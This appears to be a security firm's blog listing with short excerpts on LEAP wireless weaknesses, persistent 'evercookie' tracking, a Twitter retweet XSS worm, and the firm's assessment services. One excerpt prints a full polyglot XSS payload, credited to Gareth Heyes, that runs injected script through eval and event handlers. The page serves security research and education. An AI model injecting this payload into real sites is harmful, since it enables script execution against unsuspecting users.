Can you possibly defend the statement that 802.1x with PEAP or EAP-TTLS can be worse than open wireless with no authentication or encryption? Remember the old Cisco LEAP implementation that was vulnerable to offline brute-force attacks due to sending users’ MS-CHAP v2 challenge/response outside of a secure connection? Joshua Wright has documented this in detail and even...
As if HTTP cookies, Local Shared Objects (Flash cookies), and web developers’ understanding of them weren’t a big enough security issue, Samy Kamkar has written a JavaScript API for “virtually irrevocable persistent cookies.” Want to keep track of users even after they remove their cookies, switch browsers, clear cache, or whatever? No problem, just throw a reference to...
So someone started a re-tweet XSS worm on Twitter. They were able to embed a span class and provide an “onmouseover” event that causes the post to be re-tweeted when hovered over. Twitter has “patched” but I still see lots of folks trying to prove them wrong. There’s some better analysis about the whole thing...
Gareth Heyes of The Spanner came up with an XSS payload that works in multiple contexts and browsers. As always, mileage will vary by vector and browser, but I thought it was universal/cool enough to mention. javascript:/*–></marquee></script></title></textarea></noscript></style></xmp>”>[img=1]<img -/style=-=expression(/*’/-/*’,/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>”
The majority of our assessment clients choose a full-disclosure approach to security assessments. They realize that this helps us maximize results in terms of vulnerabilities discovered, thus providing the most value for a given cost. Other times assessment clients are interested in zero-knowledge assessments that simulate an attack from an outside threat with minimal knowledge...
The main difference between our Basic and Standard web application security assessment services is that for Basic assessments, we only perform unauthenticated testing, unless of course we gain authenticated access through exploitation of some vulnerability. Our Standard application security assessments test the application from both unauthenticated perspectives and the authenticated perspectives of user roles in scope....